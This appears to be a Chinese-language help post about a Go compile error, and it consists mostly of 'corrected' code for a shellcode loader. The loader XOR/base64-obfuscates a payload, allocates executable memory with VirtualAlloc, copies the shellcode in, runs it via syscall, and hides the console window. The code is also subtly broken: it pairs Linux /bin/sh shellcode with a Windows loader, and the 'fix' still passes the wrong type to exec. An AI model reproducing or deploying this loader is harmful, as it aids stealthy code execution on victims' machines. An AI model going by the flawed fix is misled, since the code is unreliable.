Go 代码报错：syscall.Syscall 参数类型错误

代码中使用了 syscall 包和 unsafe.Pointer，这些都是与系统交互的低级操作，需要小心使用。

报错信息是：

# command-line-arguments
./main.go:81:51: cannot use shellCodeHex (type []byte) as type uintptr in argument to syscall.Syscall

这是因为在执行 shellCodeHex 时，需要将其转换为 uintptr 类型，但代码中直接将 shellCodeHex 作为参数传递给了 syscall.Syscall，需要使用 unsafe.Pointer 将其转换为 uintptr 类型。

修改后的代码：

package main

import (
	"encoding/base64"
	"syscall"
	"time"
	"unsafe"

	"github.com/lxn/win"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var XorKey = [][]byte{
	{0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B},
	{0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B},
	{0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B},
}

type CipherFunc func(key []byte, src []byte) []byte

func XorCipher(key []byte, src []byte) []byte {
	var dst []byte
	for i := 0; i < len(src); i++ {
		byteToEncode := src[i]
		for _, k := range key {
			byteToEncode ^= k
		}
		dst = append(dst, byteToEncode)
	}
	return dst
}

func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	return cipher(key, src)
}

func Encode(src []byte) string {
	encodedBytes := Crypt(XorCipher, XorKey[0], src)
	bdata := base64.StdEncoding.EncodeToString(encodedBytes)
	return bdata
}

func Decode(src string) []byte {
	decodedBytes, _ := base64.StdEncoding.DecodeString(src)
	payloadBytes := Crypt(XorCipher, XorKey[0], decodedBytes)
	return payloadBytes
}

var (
	kernel32      = syscall.NewLazyDLL("kernel32.dll")
	ntdll         = syscall.NewLazyDLL("ntdll.dll")
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")
	RtlMoveMemory = ntdll.NewProc("RtlMoveMemory")
)

func exec(charcode []byte) {
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	time.Sleep(5)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5)
	syscall.Syscall(addr, 0, 0, 0, 0)
}

func main() {
	payload := "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
	encodedPayload := Encode([]byte(payload))
	shellCodeHex := Decode(encodedPayload)
	win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
	exec(unsafe.Pointer(&shellCodeHex[0]))
}